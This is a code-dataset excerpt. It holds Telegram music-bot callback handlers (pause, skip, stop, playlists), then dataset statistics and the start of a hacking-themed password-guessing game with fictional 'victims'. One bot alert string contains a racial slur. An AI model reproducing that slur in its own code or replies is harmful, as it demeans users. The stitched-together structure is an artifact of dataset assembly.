smex, user_id = callback_request.split("|")
except Exception as e:
await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
return
if CallbackQuery.from_user.id != int(user_id):
await CallbackQuery.answer("You're not allowed to close this Nigga", show_alert=True)
return
await CallbackQuery.message.delete()
await CallbackQuery.answer()
@Client.on_callback_query(filters.regex("pausevc"))
async def pausevc(_,CallbackQuery):
a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
if not a.can_manage_voice_chats:
return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
checking = CallbackQuery.from_user.first_name
chat_id = CallbackQuery.message.chat.id
if await is_active_chat(chat_id):
if await is_music_playing(CallbackQuery.message.chat.id):
yukki.pytgcalls.pause_stream(CallbackQuery.message.chat.id)
await music_off(chat_id)
await CallbackQuery.answer("Voicechat Paused", show_alert=True)
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
await CallbackQuery.message.reply(f"🎧 Voicechat Paused by {rpk}!", reply_markup=play_keyboard)
await CallbackQuery.message.delete()
else:
await CallbackQuery.answer(f"Nothing's playing on MUNNA X MUSIC!", show_alert=True)
return
else:
await CallbackQuery.answer(f"Nothing's playing on MUNNA X MUSIC", show_alert=True)
@Client.on_callback_query(filters.regex("resumevc"))
async def resumevc(_,CallbackQuery):
a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
if not a.can_manage_voice_chats:
return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
checking = CallbackQuery.from_user.first_name
chat_id = CallbackQuery.message.chat.id
if await is_active_chat(chat_id):
if await is_music_playing(CallbackQuery.message.chat.id):
await CallbackQuery.answer("I dont think if something's paused on voice chat", show_alert=True)
return
else:
await music_on(chat_id)
yukki.pytgcalls.resume_stream(CallbackQuery.message.chat.id)
await CallbackQuery.answer("Voicechat Resumed", show_alert=True)
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
await CallbackQuery.message.reply(f"🎧 Voicechat Resumed by {rpk}!", reply_markup=play_keyboard)
await CallbackQuery.message.delete()
else:
await CallbackQuery.answer(f"Nothing's playing on MUNNA X MUSIC!", show_alert=True)
@Client.on_callback_query(filters.regex("skipvc"))
async def skipvc(_,CallbackQuery):
a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
if not a.can_manage_voice_chats:
return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
checking = CallbackQuery.from_user.first_name
chat_id = CallbackQuery.message.chat.id
chat_title = CallbackQuery.message.chat.title
if await is_active_chat(chat_id):
task_done(CallbackQuery.message.chat.id)
if is_empty(CallbackQuery.message.chat.id):
user_id = CallbackQuery.from_user.id
await remove_active_chat(chat_id)
user_name = CallbackQuery.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
await remove_active_chat(chat_id)
await CallbackQuery.answer()
await CallbackQuery.message.reply(f"**__Skip Button Used By__** {rpk}\n\nNo more music in __Queues__ \n\nLeaving Voice Chat")
yukki.pytgcalls.leave_group_call(CallbackQuery.message.chat.id)
return
else:
await CallbackQuery.answer("Voicechat Skipped", show_alert=True)
afk = get(chat_id)['file']
f1 = (afk[0])
f2 = (afk[1])
f3 = (afk[2])
finxx = (f"{f1}{f2}{f3}")
if str(finxx) != "raw":
mystic = await CallbackQuery.message.reply("MUNNA X MUSIC is currently playing Playlist...\n\nDownloading Next Music From Playlist....")
url = (f"https://www.youtube.com/watch?v={afk}")
try:
with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
x = ytdl.extract_info(url, download=False)
except Exception as e:
return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
title = (x["title"])
videoid = afk
def my_hook(d):
if d['status'] == 'downloading':
percentage = d['_percent_str']
per = (str(percentage)).replace(".","", 1).replace("%","", 1)
per = int(per)
eta = d['eta']
speed = d['_speed_str']
size = d['_total_bytes_str']
bytesx = d['total_bytes']
if str(bytesx) in flex:
pass
else:
flex[str(bytesx)] = 1
if flex[str(bytesx)] == 1:
flex[str(bytesx)] += 1
sedtime.sleep(1)
mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
if per > 500:
if flex[str(bytesx)] == 2:
flex[str(bytesx)] += 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
if per > 800:
if flex[str(bytesx)] == 3:
flex[str(bytesx)] += 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
if per == 1000:
if flex[str(bytesx)] == 4:
flex[str(bytesx)] = 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}.....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
loop = asyncio.get_event_loop()
xx = await loop.run_in_executor(None, download, url, my_hook)
file = await convert(xx)
yukki.pytgcalls.change_stream(chat_id, file)
thumbnail = (x["thumbnail"])
duration = (x["duration"])
duration = round(x["duration"] / 60)
theme = random.choice(themes)
ctitle = (await app.get_chat(chat_id)).title
ctitle = await CHAT_TITLE(ctitle)
f2 = open(f'search/{afk}id.txt', 'r')
userid =(f2.read())
thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
user_id = userid
buttons = play_markup(videoid, user_id)
await mystic.delete()
semx = await app.get_users(userid)
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
await CallbackQuery.message.reply_photo(
photo= thumb,
reply_markup=InlineKeyboardMarkup(buttons),
caption=(f"<b>__Skipped Voice Chat By {rpk}__</b>\n\n🎥<b>__Started Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} Mins\n👤**__Requested by:__** {semx.mention}")
)
os.remove(thumb)
else:
yukki.pytgcalls.change_stream(chat_id, afk)
_chat_ = ((str(afk)).replace("_","", 1).replace("/","", 1).replace(".","", 1))
f2 = open(f'search/{_chat_}title.txt', 'r')
title =(f2.read())
f3 = open(f'search/{_chat_}duration.txt', 'r')
duration =(f3.read())
f4 = open(f'search/{_chat_}username.txt', 'r')
username =(f4.read())
f4 = open(f'search/{_chat_}videoid.txt', 'r')
videoid =(f4.read())
user_id = 1
videoid = str(videoid)
if videoid == "smex1":
buttons = audio_markup(videoid, user_id)
else:
buttons = play_markup(videoid, user_id)
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
await CallbackQuery.message.reply_photo(
photo=f"downloads/{_chat_}final.png",
reply_markup=InlineKeyboardMarkup(buttons),
caption=f"<b>__Skipped Voice Chat By {rpk}__</b>\n\n🎥<b>__Started Playing:__</b> {title} \n⏳<b>__Duration:__</b> {duration} \n👤<b>__Requested by:__ </b> {username}",
)
return
@Client.on_callback_query(filters.regex("stopvc"))
async def stopvc(_,CallbackQuery):
a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
if not a.can_manage_voice_chats:
return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
checking = CallbackQuery.from_user.first_name
chat_id = CallbackQuery.message.chat.id
if await is_active_chat(chat_id):
try:
clear(chat_id)
except QueueEmpty:
pass
try:
yukki.pytgcalls.leave_group_call(CallbackQuery.message.chat.id)
except Exception as e:
pass
await remove_active_chat(CallbackQuery.message.chat.id)
await CallbackQuery.answer("Voicechat Stopped", show_alert=True)
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
await CallbackQuery.message.reply(f"🎧 Voicechat End/Stopped by {rpk}!")
else:
await CallbackQuery.answer(f"Nothing's playing on Yukki!", show_alert=True)
@Client.on_callback_query(filters.regex("play_playlist"))
async def play_playlist(_,CallbackQuery):
callback_data = CallbackQuery.data.strip()
chat_id = CallbackQuery.message.chat.id
callback_request = callback_data.split(None, 1)[1]
userid = CallbackQuery.from_user.id
try:
user_id,smex = callback_request.split("|")
except Exception as e:
await CallbackQuery.answer()
return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
Name = CallbackQuery.from_user.first_name
chat_title = CallbackQuery.message.chat.title
if str(smex) == "personal":
if CallbackQuery.from_user.id != int(user_id):
return await CallbackQuery.answer("This is not for you! Play your own playlist", show_alert=True)
_playlist = await get_note_names(CallbackQuery.from_user.id)
if not _playlist:
return await CallbackQuery.answer(f"You have no playlist on servers.", show_alert=True)
else:
await CallbackQuery.message.delete()
logger_text=f"""Starting Playlist
Group :- {chat_title}
By :- {Name}
Personal Playlist Playing."""
await ASS_ACC.send_message(LOG_GROUP_ID, f"{logger_text}", disable_web_page_preview=True)
mystic = await CallbackQuery.message.reply_text(f"Starting {Name}'s Personal Playlist.\n\nRequested By:- {CallbackQuery.from_user.first_name}")
checking = f"[{CallbackQuery.from_user.first_name}](tg://user?id={userid})"
msg = f"Queued Playlist:\n\n"
j = 0
for note in _playlist:
_note = await get_playlist(CallbackQuery.from_user.id, note)
title = _note["title"]
videoid = _note["videoid"]
url = (f"https://www.youtube.com/watch?v={videoid}")
duration = _note["duration"]
if await is_active_chat(chat_id):
position = await put(chat_id, file=videoid)
j += 1
msg += f"{j}- {title[:50]}\n"
msg += f" Queued Position- {position}\n\n"
f20 = open(f'search/{videoid}id.txt', 'w')
f20.write(f"{user_id}")
f20.close()
else:
try:
with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
x = ytdl.extract_info(url, download=False)
except Exception as e:
return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
title = (x["title"])
thumbnail = (x["thumbnail"])
def my_hook(d):
if d['status'] == 'downloading':
percentage = d['_percent_str']
per = (str(percentage)).replace(".","", 1).replace("%","", 1)
per = int(per)
eta = d['eta']
speed = d['_speed_str']
size = d['_total_bytes_str']
bytesx = d['total_bytes']
if str(bytesx) in flex:
pass
else:
flex[str(bytesx)] = 1
if flex[str(bytesx)] == 1:
flex[str(bytesx)] += 1
try:
if eta > 2:
mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
except Exception as e:
pass
if per > 250:
if flex[str(bytesx)] == 2:
flex[str(bytesx)] += 1
if eta > 2:
mystic.edit(f"Downloading {title[:50]}..\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
if per > 500:
if flex[str(bytesx)] == 3:
flex[str(bytesx)] += 1
if eta > 2:
mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
if per > 800:
if flex[str(bytesx)] == 4:
flex[str(bytesx)] += 1
if eta > 2:
mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
if d['status'] == 'finished':
try:
taken = d['_elapsed_str']
except Exception as e:
taken = "00:00"
size = d['_total_bytes_str']
mystic.edit(f"**Downloaded {title[:50]}.....**\n\n**FileSize:** {size}\n**Time Taken:** {taken} sec\n\n**Converting File**[__FFmpeg processing__]")
print(f"[{videoid}] Downloaded| Elapsed: {taken} seconds")
loop = asyncio.get_event_loop()
xx = await loop.run_in_executor(None, download, url, my_hook)
file = await convert(xx)
await music_on(chat_id)
await add_active_chat(chat_id)
yukki.pytgcalls.join_group_call(chat_id, file)
theme = random.choice(themes)
ctitle = CallbackQuery.message.chat.title
ctitle = await CHAT_TITLE(ctitle)
thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
buttons = play_markup(videoid, user_id)
m = await CallbackQuery.message.reply_photo(
photo=thumb,
reply_markup=InlineKeyboardMarkup(buttons),
caption=(f"🎥<b>__Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} \n💡<b>__Info:__</b> [Get Additional Information](https://t.me/{BOT_USERNAME}?start=info_{videoid})\n👤**__Requested by:__** {checking}")
)
os.remove(thumb)
await CallbackQuery.message.delete()
await mystic.delete()
m = await CallbackQuery.message.reply_text("Pasting Queued Playlist to Bin")
link = await paste(msg)
preview = link + "/preview.png"
urlxp = link + "/index.txt"
a1 = InlineKeyboardButton(text=f"Checkout Queued Playlist", url=urlxp)
key = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(text="▶️", callback_data=f'resumevc2'),
InlineKeyboardButton(text="⏸️", callback_data=f'pausevc2'),
InlineKeyboardButton(text="⏭️", callback_data=f'skipvc2'),
InlineKeyboardButton(text="⏹️", callback_data=f'stopvc2')
],
[
a1,
],
[
InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
]
]
)
if await isPreviewUp(preview):
try:
await CallbackQuery.message.reply_photo(
photo=preview, caption=f"This is Queued Playlist of {Name}.\n\nIf you want to delete any music from playlist use : /delmyplaylist", quote=False, reply_markup=key
)
await m.delete()
except Exception:
pass
else:
await CallbackQuery.message.reply_text(
text=msg, reply_markup=key
)
await m.delete()
if str(smex) == "group":
_playlist = await get_note_names(CallbackQuery.message.chat.id)
if not _playlist:
return await CallbackQuery.answer(f"Your Group has no playlist on servers. Try adding musics in playlist.", show_alert=True)
else:
await CallbackQuery.message.delete()
logger_text=f"""Starting Playlist
Group :- {chat_title}
By :- {Name}
Group Playlist Playing."""
await ASS_ACC.send_message(LOG_GROUP_ID, f"{logger_text}", disable_web_page_preview=True)
mystic = await CallbackQuery.message.reply_text(f"Starting Groups's Playlist.\n\nRequested By:- {CallbackQuery.from_user.first_name}")
checking = f"[{CallbackQuery.from_user.first_name}](tg://user?id={userid})"
msg = f"Queued Playlist:\n\n"
j = 0
for note in _playlist:
_note = await get_playlist(CallbackQuery.message.chat.id, note)
title = _note["title"]
videoid = _note["videoid"]
url = (f"https://www.youtube.com/watch?v={videoid}")
duration = _note["duration"]
if await is_active_chat(chat_id):
position = await put(chat_id, file=videoid)
j += 1
msg += f"{j}- {title[:50]}\n"
msg += f" Queued Position- {position}\n\n"
f20 = open(f'search/{videoid}id.txt', 'w')
f20.write(f"{user_id}")
f20.close()
else:
try:
with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
x = ytdl.extract_info(url, download=False)
except Exception as e:
return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
title = (x["title"])
thumbnail = (x["thumbnail"])
def my_hook(d):
if d['status'] == 'downloading':
percentage = d['_percent_str']
per = (str(percentage)).replace(".","", 1).replace("%","", 1)
per = int(per)
eta = d['eta']
speed = d['_speed_str']
size = d['_total_bytes_str']
bytesx = d['total_bytes']
if str(bytesx) in flex:
pass
else:
flex[str(bytesx)] = 1
if flex[str(bytesx)] == 1:
flex[str(bytesx)] += 1
try:
if eta > 2:
mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
except Exception as e:
pass
if per > 250:
if flex[str(bytesx)] == 2:
flex[str(bytesx)] += 1
if eta > 2:
mystic.edit(f"Downloading {title[:50]}..\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
if per > 500:
if flex[str(bytesx)] == 3:
flex[str(bytesx)] += 1
if eta > 2:
mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
if per > 800:
if flex[str(bytesx)] == 4:
flex[str(bytesx)] += 1
if eta > 2:
mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
if d['status'] == 'finished':
try:
taken = d['_elapsed_str']
except Exception as e:
taken = "00:00"
size = d['_total_bytes_str']
mystic.edit(f"**Downloaded {title[:50]}.....**\n\n**FileSize:** {size}\n**Time Taken:** {taken} sec\n\n**Converting File**[__FFmpeg processing__]")
print(f"[{videoid}] Downloaded| Elapsed: {taken} seconds")
loop = asyncio.get_event_loop()
xx = await loop.run_in_executor(None, download, url, my_hook)
file = await convert(xx)
await music_on(chat_id)
await add_active_chat(chat_id)
yukki.pytgcalls.join_group_call(chat_id, file)
theme = random.choice(themes)
ctitle = CallbackQuery.message.chat.title
ctitle = await CHAT_TITLE(ctitle)
thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
buttons = play_markup(videoid, user_id)
m = await CallbackQuery.message.reply_photo(
photo=thumb,
reply_markup=InlineKeyboardMarkup(buttons),
caption=(f"🎥<b>__Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} \n💡<b>__Info:__</b> [Get Additional Information](https://t.me/{BOT_USERNAME}?start=info_{videoid})\n👤**__Requested by:__** {checking}")
)
os.remove(thumb)
await CallbackQuery.message.delete()
await asyncio.sleep(1)
await mystic.delete()
m = await CallbackQuery.message.reply_text("Pasting Queued Playlist to Bin")
link = await paste(msg)
preview = link + "/preview.png"
urlxp = link + "/index.txt"
a1 = InlineKeyboardButton(text=f"Checkout Queued Playlist", url=urlxp)
key = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(text="▶️", callback_data=f'resumevc2'),
InlineKeyboardButton(text="⏸️", callback_data=f'pausevc2'),
InlineKeyboardButton(text="⏭️", callback_data=f'skipvc2'),
InlineKeyboardButton(text="⏹️", callback_data=f'stopvc2')
],
[
a1,
],
[
InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
]
]
)
if await isPreviewUp(preview):
try:
await CallbackQuery.message.reply_photo(
photo=preview, caption=f"This is Queued Playlist of Your Group.\n\nIf you want to delete any music from playlist use : /delgroupplaylist", quote=False, reply_markup=key
)
await m.delete()
except Exception:
pass
else:
await CallbackQuery.message.reply_text(
text=msg, reply_markup=key
)
await m.delete()
@Client.on_callback_query(filters.regex("group_playlist"))
async def group_playlist(_,CallbackQuery):
await CallbackQuery.answer()
a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
if not a.can_manage_voice_chats:
return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
callback_data = CallbackQuery.data.strip()
chat_id = CallbackQuery.message.chat.id
callback_request = callback_data.split(None, 1)[1]
userid = CallbackQuery.from_user.id
try:
url,smex= callback_request.split("|")
except Exception as e:
return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**: {e}")
Name = CallbackQuery.from_user.first_name
_count = await get_note_names(chat_id)
count = 0
if not _count:
sex = await CallbackQuery.message.reply_text("Welcome To MUNNA X MUSIC's Playlist Feature.\n\nGenerating Your Group's Playlist In Database...Please wait.")
await asyncio.sleep(2)
await sex.delete()
else:
for smex in _count:
count += 1
count = int(count)
if count == 30:
return await CallbackQuery.message.reply_text("Sorry! You can only have 30 music in group playlist.")
try:
url = (f"https://www.youtube.com/watch?v={url}")
results = VideosSearch(url, limit=1)
for result in results.result()["result"]:
title = (result["title"])
duration = (result["duration"])
videoid = (result["id"])
except Exception as e:
return await CallbackQuery.message.reply_text(f"Some Error Occured.\nPlease forward to @menotdeveloper\n**Possible Reason:** {e}")
_check = await get_playlist(chat_id, videoid)
title = title[:50]
if _check:
return await CallbackQuery.message.reply_text(f"{Name}, Its already in the Playlist!")
assis = {
"videoid": videoid,
"title": title,
"duration": duration,
}
await save_playlist(chat_id, videoid, assis)
Name = CallbackQuery.from_user.first_name
return await CallbackQuery.message.reply_text(f"Added to Group's Playlist by {Name}")
@Client.on_callback_query(filters.regex("playlist"))
async def pla_playylistt(_,CallbackQuery):
await CallbackQuery.answer()
callback_data = CallbackQuery.data.strip()
chat_id = CallbackQuery.message.chat.id
callback_request = callback_data.split(None, 1)[1]
userid = CallbackQuery.from_user.id
try:
url,smex= callback_request.split("|")
except Exception as e:
return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
Name = CallbackQuery.from_user.first_name
_count = await get_note_names(userid)
count = 0
if not _count:
sex = await CallbackQuery.message.reply_text("Welcome To MUNNA X MUSIC's Playlist Feature.\n\nGenerating Your Playlist In Database...Please wait.")
await asyncio.sleep(2)
await sex.delete()
else:
for smex in _count:
count += 1
count = int(count)
if count == 30:
if userid in SUDOERS:
pass
else:
return await CallbackQuery.message.reply_text("Sorry! You can only have 30 music in your playlist.")
try:
url = (f"https://www.youtube.com/watch?v={url}")
results = VideosSearch(url, limit=1)
for result in results.result()["result"]:
title = (result["title"])
duration = (result["duration"])
videoid = (result["id"])
except Exception as e:
return await CallbackQuery.message.reply_text(f"Some Error Occured.\nPlease forward to @menotdeveloper\n**Possible Reason:**{e}")
_check = await get_playlist(userid, videoid)
if _check:
return await CallbackQuery.message.reply_text(f"{Name}, Its already in the Playlist!")
title = title[:50]
assis = {
"videoid": videoid,
"title": title,
"duration": duration,
}
await save_playlist(userid, videoid, assis)
return await CallbackQuery.message.reply_text(f"Added to {Name}'s Playlist")
@Client.on_callback_query(filters.regex("P_list"))
async def P_list(_,CallbackQuery):
_playlist = await get_note_names(CallbackQuery.from_user.id)
if not _playlist:
return await CallbackQuery.answer(f"You have no Personal Playlist on servers. Try adding musics in playlist.", show_alert=True)
else:
j = 0
await CallbackQuery.answer()
msg = f"Personal Playlist:\n\n"
for note in _playlist:
j += 1
_note = await get_playlist(CallbackQuery.from_user.id, note)
title = _note["title"]
duration = _note["duration"]
msg += f"{j}- {title[:60]}\n"
msg += f" Duration- {duration} Min(s)\n\n"
await CallbackQuery.answer()
await CallbackQuery.message.delete()
m = await CallbackQuery.message.reply_text("Pasting Playlist to Bin")
link = await paste(msg)
preview = link + "/preview.png"
print(link)
urlxp = link + "/index.txt"
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
a2 = InlineKeyboardButton(text=f"Play {user_name[:17]}'s Playlist", callback_data=f'play_playlist {user_id}|personal')
a3 = InlineKeyboardButton(text=f"🔗 Check Playlist", url=urlxp)
key = InlineKeyboardMarkup(
[
[
a2,
],
[
a3,
InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
]
]
)
if await isPreviewUp(preview):
try:
await CallbackQuery.message.reply_photo(
photo=preview, quote=False, reply_markup=key
)
await m.delete()
except Exception as e :
print(e)
pass
else:
print("5")
await CallbackQuery.message.reply_photo(
photo=link, quote=False, reply_markup=key
)
await m.delete()
@Client.on_callback_query(filters.regex("G_list"))
async def G_list(_,CallbackQuery):
user_id = CallbackQuery.from_user.id
_playlist = await get_note_names(CallbackQuery.message.chat.id)
if not _playlist:
return await CallbackQuery.answer(f"You have no Group Playlist on servers. Try adding musics in playlist.", show_alert=True)
else:
await CallbackQuery.answer()
j = 0
msg = f"Group Playlist:\n\n"
for note in _playlist:
j += 1
_note = await get_playlist(CallbackQuery.message.chat.id, note)
title = _note["title"]
duration = _note["duration"]
msg += f"{j}- {title[:60]}\n"
msg += f" Duration- {duration} Min(s)\n\n"
await CallbackQuery.answer()
await CallbackQuery.message.delete()
m = await CallbackQuery.message.reply_text("Pasting Playlist to Bin")
link = await paste(msg)
preview = link + "/preview.png"
urlxp = link + "/index.txt"
user_id = CallbackQuery.from_user.id
user_name = CallbackQuery.from_user.first_name
a1 = InlineKeyboardButton(text=f"Play Group's Playlist", callback_data=f'play_playlist {user_id}|group')
a3 = InlineKeyboardButton(text=f"🔗 Check Playlist", url=urlxp)
key = InlineKeyboardMarkup(
[
[
a1,
],
[
a3,
InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
]
]
)
if await isPreviewUp(preview):
try:
await CallbackQuery.message.reply_photo(
photo=preview, quote=False, reply_markup=key
)
await m.delete()
except Exception:
pass
else:
await CallbackQuery.message.reply_photo(
photo=link, quote=False, reply_markup=key
)
await m.delete()
@Client.on_callback_query(filters.regex("cbgroupdel"))
async def cbgroupdel(_,CallbackQuery):
a = await app.get_chat_member(CallbackQuery.message.chat.id , CallbackQuery.from_user.id)
if not a.can_manage_voice_chats:
return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
await CallbackQuery.message.delete()
await CallbackQuery.answer()
_playlist = await get_note_names(CallbackQuery.message.chat.id)
if not _playlist:
return await CallbackQuery.message.reply_text("Group has no Playlist on MUNNA X MUSIC's Server")
else:
titlex = []
for note in _playlist:
await delete_playlist(CallbackQuery.message.chat.id, note)
await CallbackQuery.message.reply_text("Successfully deleted your Group's whole playlist")
@Client.on_callback_query(filters.regex("cbdel"))
async def delplcb(_,CallbackQuery):
await CallbackQuery.answer()
await CallbackQuery.message.delete()
_playlist = await get_note_names(CallbackQuery.from_user.id)
if not _playlist:
return await CallbackQuery.message.reply_text("You have no Playlist on MUNNA X MUSIC's Server")
else:
titlex = []
for note in _playlist:
await delete_playlist(CallbackQuery.from_user.id, note)
await CallbackQuery.message.reply_text("Successfully deleted your whole playlist")
| 50.692308
| 244
| 0.559519
| 4,710
| 42,835
| 4.942038
| 0.092994
| 0.073033
| 0.055849
| 0.047687
| 0.840357
| 0.826653
| 0.793315
| 0.774842
| 0.760665
| 0.72853
| 0
| 0.008427
| 0.329567
| 42,835
| 845
| 245
| 50.692308
| 0.800752
| 0
| 0
| 0.724224
| 0
| 0.039752
| 0.199762
| 0.044262
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003727
| false
| 0.014907
| 0.067081
| 0
| 0.115528
| 0.017391
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72ad14e6b6354b234e34163e68c1cabbac949a35
| 35,186
|
py
|
Python
|
Plugins/Games/EvilNinja/Functions.py
|
CHHOrganization/BlackDoc
|
7931f7d659344b44b6bdedfc0f1157910366bf64
|
[
"Unlicense"
] | 3
|
2022-03-17T23:19:52.000Z
|
2022-03-18T10:36:52.000Z
|
Plugins/Games/EvilNinja/Functions.py
|
CHHOrganization/BlackDoc
|
7931f7d659344b44b6bdedfc0f1157910366bf64
|
[
"Unlicense"
] | 1
|
2022-03-18T04:51:44.000Z
|
2022-03-21T02:16:13.000Z
|
Plugins/Games/EvilNinja/Functions.py
|
CHHOrganization/BlackDoc
|
7931f7d659344b44b6bdedfc0f1157910366bf64
|
[
"Unlicense"
] | null | null | null |
import os,sys,time
from Settings import *
#EVilNinja Data
Level_1_Names = ["Kerry", "Jackey", "Mary", "Blackey", "Melisa", "Susan"]
Level_1_Surnames = ["White", "Rockafeller", "Chinano", "Kingsley", "Martinez", "White"]
Level_1_DOBs = ["1980-12-26", "1966-03-09", "1972-06-23", "1994-08-08", "1982-11-10", "1961-06-16" ]
EL_Passwords = ["26White12", "6603Jackey", "197206Mary", "Kingsley08", "1982Martinez", "Susan1961"]
Level_2_Names = ["Kerry", "Jackey", "Mary", "Blackey", ""]
Level_2_Surnames = ["White", "Rockafeller", "Chinano", "Kingsley"]
Level_2_DOBs = ["1980-12-26", "1966-03-09", "1972-06-23", "1994-08-08" ]
NL_Passwords = ["26White12", "6603Jackey", "197206Mary", "Kingsley08"]
Level_3_Names = ["Kerry", "Jackey", "Mary", "Blackey", ""]
Level_3_Surnames = ["White", "Rockafeller", "Chinano", "Kingsley"]
Level_3_DOBs = ["1980-12-26", "1966-03-09", "1972-06-23", "1994-08-08" ]
HL_Passwords = ["26White12", "6603Jackey", "197206Mary", "Kingsley08"]
#Victims data dashborad hader
def Victims_DDB():
Victims_Data = "-------Here Is The Victims Details-------"
print(BG_Bright_Cyan + Bright_Yellow)
for char in Victims_Data:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print(Rest +"")
#Victims data for Easy Levels
def Victims_Data_ELS1():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms1 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[0])
print("Surname: "+ Level_1_Surnames[0])
print("Date of Birth: "+ Level_1_DOBs[0])
def Victims_Data_ELS2():
